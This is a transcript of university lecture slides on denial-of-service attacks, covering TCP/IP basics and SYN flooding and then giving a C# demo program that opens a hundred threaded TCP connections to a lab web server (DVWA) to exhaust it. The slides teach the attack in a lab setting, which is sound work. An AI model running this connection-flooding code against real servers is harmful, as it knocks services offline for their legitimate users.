Presentation is loading. Please wait.

Presentation is loading. Please wait.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

Published byDaisy Jefferson Modified over 8 years ago

Similar presentations

Presentation on theme: "NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba."— Presentation transcript:

1 NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba Czech Republic Denial of service (DOS)

2 navy.cs.vsb.cz 2 TCP/IP model vs. OSI-RM

3 navy.cs.vsb.cz 3 TCP/IP model

4 navy.cs.vsb.cz 4 IP protocol Definied in RFC: 791 Operates on OSI Layer 3 Allows to send independent packets between stations of the internetwork Unreliable connectionless service

5 navy.cs.vsb.cz 5 IP Header

6 navy.cs.vsb.cz 6 TCP/IP transport layer (TCP) Defined in RFC: 793 The transport-layer entity (i.e. process or service running on a particular machine) is identified by the machine's IP address and port number (which is local to the particular machine) Port number is 16bit number (0-65535) – 0-1023: well-known services (80 - HTTP) – 1024-4096: other registered applications (1433 – MSSQL Server) – >4096 – client (ephemeral) ports (usually are assigned by the OS to the applications)

7 navy.cs.vsb.cz 7 TCP/IP transport layer (TCP&UDP) The transport-layer entity (i.e. process or service running on a particular machine) is identified by the machine's IP address and port number (which is local to the particular machine) Port number is 16bit number (0-65535) – 0-1023: well-known services (80 - HTTP) – 1024-4096: other registered applications (1433 – MSSQL Server) – >4096 – client (ephemeral) ports (usually are assigned by the OS to the applications)

8 navy.cs.vsb.cz 8 TCP protocol Defined in RFC: 793 Provides a reliable duplex communication Over unreliable IP – IP may drop and duplicate packets and deliver them out of order – TCP protocol ensures reliability of data transfers for upper (application) layer protocols

9 navy.cs.vsb.cz 9 TCP Header

10 navy.cs.vsb.cz 10 TCP connection establishment Three way handshake: SYN, SYN+ACK,ACK – Initial sequence number negotiation (independently for both directions) – ISNs are „random“ to avoid confusing of the receiving station by delayed packets from previous connection between the same stations Opening of a connection by both sides simultaneously results in a single connection

11 navy.cs.vsb.cz 11 TCP connection establishment

12 navy.cs.vsb.cz 12 TCP connection data flow

13 navy.cs.vsb.cz 13 TCP connection termination Any side may close the connection first Both sides have to close the connection independently – FIN+ACK (from both sides)

14 navy.cs.vsb.cz 14 TCP connection in Wireshark

15 navy.cs.vsb.cz 15 Denial of service attack (DOS) A denial of service attack is characterized by an explicit attempt by attackers to prevent legitimate users of a service from using that service. For example: – attempts to flood a network, thereby preventing legitimate network traffic – attempts to disrupt connections between two machines, thereby preventing access to a service – attempts to prevent a particular individual from accessing a service – attempts to disrupt service to a specific system or person

16 navy.cs.vsb.cz 16 DOS – TCP SYN Flooding The goal is to prevent hosts or networks from communicating on the network. The client system begins by sending a SYN message to the server. The server then acknowledges the SYN message by sending SYN-ACK message to the client. The client then finishes establishing the connection by responding with an ACK message. – The connection between the client and the server is then open, and the service-specific data can be exchanged between the client and the server.

17 navy.cs.vsb.cz 17 DOS – TCP SYN Flooding The potential for abuse arises at the point where the server system has sent an acknowledgment (SYN-ACK) back to client but has not yet received the ACK message. – he server has built in its system memory a data structure describing all pending connections. This data structure is of finite size, and it can be made to overflow by intentionally creating too many partially-open connections.

18 navy.cs.vsb.cz 18 Demo - Tools Hosted web application (DVWA) Basic knowledge of some programming language (C#, Java, C++)

19 navy.cs.vsb.cz 19 Demo In.NET (C#) application we need to open TCP connection from client (attacker’s) application to the server. – Use System.Net.Sockets.TcpClient class TcpClient tcpClient = new TcpClient(); We need to open the connection on the specific IP address and specific port (HTTP protocol uses TCP80/ HTTPS protocol uses TCP443) – Use System.Net.IpEndpoint class IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(ipAddress), 80);

20 navy.cs.vsb.cz 20 Demo And finally we open the connection tcpClient.Connect(endPoint); To overload our testing web application, we need to open many connections. However all network operations are program-blocking. Thus we need open each connection in its own thread. – Use System.Threading.Thread class Thread thread = new Thread(FunctionDelegateToExecute); thread.Start();

21 navy.cs.vsb.cz 21 Demo Final method could looks like private static void SendRequest(string ipAddress, string threadName) { System.Net.Sockets.TcpClient tcpClient = new TcpClient(); IPEndPoint endPoint = new IPEndPoint(IPAddress.Parse(ipAddress), 80); try { tcpClient.Connect(endPoint); Console.WriteLine("Thread #{0}: {1}", threadName, DateTime.Now); } catch (Exception){} while (run) { Console.WriteLine("Thread #{0}: {1} sleeps", threadName, DateTime.Now); Thread.Sleep(1000); } tcpClient.Close(); }

22 navy.cs.vsb.cz 22 Demo Final application could looks like private static bool run = true; static void Main(string[] args) { string ipAddress = "192.168.XXX.XXX"; int threads = 100; List threadPool = new List (); for (int i = 0; i < threads; i++) { ThreadStart threadStart = () => SendRequest(ipAddress, i.ToString()); var thread = new Thread(threadStart) { IsBackground = true }; threadPool.Add(thread); thread.Start(); } Console.ReadLine(); run = false; foreach (var thread in threadPool) { thread.Abort(); }

23 navy.cs.vsb.cz 23 Demo – Legitimate traffic

24 navy.cs.vsb.cz 24 Demo – Legitimate traffic

25 navy.cs.vsb.cz 25 Demo Start Wireshark on the server with the DVWA application Start your malicious application doing the DoS attack and

26 navy.cs.vsb.cz 26 Demo Try to access the DVWA web application from browser

27 navy.cs.vsb.cz 27 Demo See the Wireshark log

28 navy.cs.vsb.cz 28 References DVWA - http://www.dvwa.co.uk/http://www.dvwa.co.uk/ CERT - https://www.us-cert.gov/ncas/tips/ST04- 015 CSRF - http://www.cgisecurity.com/csrf-faq.htmlhttp://www.cgisecurity.com/csrf-faq.html HACKING EXPOSED (ISBN: 978-0-07-161375-0) Penetration testing (ISBN-10: 1-59327-564-1) Principles of Computer Security (ISBN: 978-0-07- 174857-5)

29 navy.cs.vsb.cz 29 Warning Hacking is illegal because it is getting into a system another person owns. If you wanted to do legal hacking then you would have to own the system.

Download ppt "NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba."

Similar presentations

PJC CCNA Semester 2 Ver. 3.0 by William Kelly

PJC CCNA Semester 2 Ver. 3.0 by William Kelly
Umut Girit 200535027.  One of the core members of the Internet Protocol Suite, the set of network protocols used for the Internet. With UDP, computer.

Umut Girit  One of the core members of the Internet Protocol Suite, the set of network protocols used for the Internet. With UDP, computer.
Cisco 2 - Routers Perrine. J Page 14/30/2015 Chapter 10 TCP/IP Protocol Suite The function of the TCP/IP protocol stack is to transfer information from.

Cisco 2 - Routers Perrine. J Page 14/30/2015 Chapter 10 TCP/IP Protocol Suite The function of the TCP/IP protocol stack is to transfer information from.
CISCO NETWORKING ACADEMY Chabot College ELEC 99.05 Transport Layer (4)

CISCO NETWORKING ACADEMY Chabot College ELEC Transport Layer (4)
CCNA – Network Fundamentals

CCNA – Network Fundamentals
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 OSI Transport Layer Network Fundamentals – Chapter 4.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 OSI Transport Layer Network Fundamentals – Chapter 4.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 OSI Transport Layer Network Fundamentals – Chapter 4.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 OSI Transport Layer Network Fundamentals – Chapter 4.
Transmission Control Protocol (TCP)

Transmission Control Protocol (TCP)
Intermediate TCP/IP TCP Operation.

Intermediate TCP/IP TCP Operation.
CISCO NETWORKING ACADEMY PROGRAM (CNAP)

CISCO NETWORKING ACADEMY PROGRAM (CNAP)
Chapter 7: Transport Layer

Chapter 7: Transport Layer
Lecture 7 Transport Layer

Lecture 7 Transport Layer
UDP & TCP Where would we be without them!. UDP User Datagram Protocol.

UDP & TCP Where would we be without them!. UDP User Datagram Protocol.
Chapter 7 – Transport Layer Protocols

Chapter 7 – Transport Layer Protocols
CCNA 1 v3.1 Module 11 Review.

CCNA 1 v3.1 Module 11 Review.
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 OSI Transport Layer Network Fundamentals – Chapter 4.

© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public 1 Version 4.0 OSI Transport Layer Network Fundamentals – Chapter 4.
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu 15 708 33 Ostrava-Poruba.

NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Distributed Denial of Service Attacks CMPT 471 1 Distributed Denial of Service Attacks Darius Law.

Distributed Denial of Service Attacks CMPT Distributed Denial of Service Attacks Darius Law.
CSE 461: Transport Layer Connections. Naming Processes/Services  Process here is an abstract term for your Web browser (HTTP), servers (SMTP),

CSE 461: Transport Layer Connections. Naming Processes/Services  Process here is an abstract term for your Web browser (HTTP), servers (SMTP),
TCP/IP Network and Firewall. IP Packet Protocol  1 ICMP packet  6 TCP packet  17 UDP packet.

TCP/IP Network and Firewall. IP Packet Protocol  1 ICMP packet  6 TCP packet  17 UDP packet.

Similar presentations

Ads by Google